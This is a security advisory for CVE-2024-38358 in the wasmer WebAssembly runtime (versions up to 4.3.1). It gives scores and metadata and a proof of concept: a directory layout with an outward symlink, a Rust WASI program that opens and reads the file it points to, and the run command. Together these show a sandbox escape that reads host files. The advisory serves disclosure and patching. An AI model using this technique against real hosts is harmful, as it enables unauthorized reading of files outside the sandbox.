CVE-2024-38358 – wasmer

Package

Manager: cargo
Name: wasmer
Vulnerable Version: >=0 <=4.3.1

Severity

Level: Low

CVSS v3.1: CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

CVSS v4.0: CVSS:4.0/AV:L/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N

EPSS: 0.00104 pctl0.29086

Details

Symlink bypasses filesystem sandbox ### Summary If the preopened directory has a symlink pointing outside, WASI programs can traverse the symlink and access host filesystem if the caller sets both `oflags::creat` and `rights::fd_write`. Programs can also crash the runtime by creating a symlink pointing outside with `path_symlink` and `path_open`ing the link. ### Details ### PoC Setup a filesystem as follows. ``` . ├── outside.file └── preopen └── dir └── file -> ../../outside.file ``` Compile this Rust snippet with `wasi` v0.11 (for the preview1 API). ```rust fn main() { unsafe { let filefd = wasi::path_open( 5, wasi::LOOKUPFLAGS_SYMLINK_FOLLOW, "app/dir/file", wasi::OFLAGS_CREAT, wasi::RIGHTS_FD_READ | wasi::RIGHTS_FD_WRITE, 0, 0, ) .unwrap(); eprintln!("filefd: {filefd}"); let mut buf = [0u8; 10]; let iovs = [wasi::Iovec { buf: buf.as_mut_ptr(), buf_len: buf.len(), }]; let read = wasi::fd_read(filefd, &iovs).unwrap(); eprintln!("read {read}: {}", String::from_utf8_lossy(&buf)); } } ``` Run the compiled binary with Wasmer preopening `preopen/`: ``` wasmer run --mapdir /app:preopen a.wasm ``` This should not print the contents of the `outside.file`. Other runtimes like Wasmtime can successfully block this call. But Wasmer prints the contents of the file.

Metadata

Created: 2024-06-07T19:40:00Z
Modified: 2024-06-20T14:14:38Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/06/GHSA-55f3-3qvg-8pv5/GHSA-55f3-3qvg-8pv5.json
CWE IDs: ["CWE-22"]
Alternative ID: GHSA-55f3-3qvg-8pv5
Finding: F063
Auto approve: 1